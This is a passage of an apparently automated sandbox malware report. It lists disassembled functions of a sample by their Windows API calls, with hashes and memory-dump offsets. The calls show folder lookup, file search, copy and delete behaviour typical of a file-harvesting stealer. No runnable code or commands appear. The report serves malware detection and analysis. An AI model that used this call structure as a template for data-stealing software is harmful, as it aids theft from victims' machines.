                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: `o@
                                              • API String ID: 0-590292170
                                              • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                              • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                              • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                              • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                              APIs
                                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                              • lstrcatA.KERNEL32(?,02BE9FE8), ref: 00414C08
                                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,02BEB060,?,000003E8), ref: 00414A4A
                                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                              • String ID: UaA
                                              • API String ID: 2104210347-3893042857
                                              • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                              • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                              • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                              • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • GetSystemTime.KERNEL32(?,02BB4BE0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: SystemTimelstrcpy
                                              • String ID: cI@$cI@
                                              • API String ID: 62757014-1697673767
                                              • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                              • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                              • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                              • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                              APIs
                                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                              • lstrcatA.KERNEL32(?,02BE97F0), ref: 004150A8
                                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                              • String ID: aA
                                              • API String ID: 2699682494-2567749500
                                              • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                              • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                              • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                              • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 047EA094
                                              • lstrlen.KERNEL32(00000000), ref: 047EBF06
                                                • Part of subcall function 047F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 047F90B9
                                              • StrStrA.SHLWAPI(00000000,004213E0), ref: 047EBF34
                                              • lstrlen.KERNEL32(00000000), ref: 047EC00C
                                              • lstrlen.KERNEL32(00000000), ref: 047EC020
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                              • String ID:
                                              • API String ID: 1440504306-0
                                              • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                              • Instruction ID: 8c6b15ee5c35724964c199295f78a51145ab95e4dce3af1989baf6300a2ca66e
                                              • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                              • Instruction Fuzzy Hash: 2FB13271910218ABEB18FBA0DD99EFD7339AF54208F40456DE60A62390EF347B48CF61
                                              APIs
                                              • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                              • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                              • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                              • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFileNextlstrcat
                                              • String ID: !=A
                                              • API String ID: 3840410801-2919091325
                                              • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                              • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                              • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                              • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                              APIs
                                                • Part of subcall function 047F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 047F9072
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F51E1
                                              • lstrcat.KERNEL32(?,00421070), ref: 047F51FE
                                              • lstrcat.KERNEL32(?,0064A5F8), ref: 047F5212
                                              • lstrcat.KERNEL32(?,00421074), ref: 047F5224
                                                • Part of subcall function 047F4B77: wsprintfA.USER32 ref: 047F4B93
                                                • Part of subcall function 047F4B77: FindFirstFileA.KERNEL32(?,?), ref: 047F4BAA
                                                • Part of subcall function 047F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 047F4BD8
                                                • Part of subcall function 047F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 047F4BEE
                                                • Part of subcall function 047F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 047F4DE4
                                                • Part of subcall function 047F4B77: FindClose.KERNEL32(000000FF), ref: 047F4DF9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                              • String ID:
                                              • API String ID: 2667927680-0
                                              • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                              • Instruction ID: 7a31e85af14b786071b4c0bf579d31417f5c14fc51cdfa19d3ec1ddfbe796a57
                                              • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                              • Instruction Fuzzy Hash: 9021AA7AA50208BBD754FBF0DC49EE9337DEB59700F404589B74992380DE74A6C9CBA2
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpynlstrlenwsprintf
                                              • String ID:
                                              • API String ID: 1206339513-0
                                              • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                              • Instruction ID: 0c0d1a9763cf2e555c9ff2a22a2604b58e451d2ff9aa9eaf71f80d791e3d48ad
                                              • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                              • Instruction Fuzzy Hash: B601CCB9540108FFCB04DFECD994EAE7BBAEB45354F108148FA099B341C635AA40DB95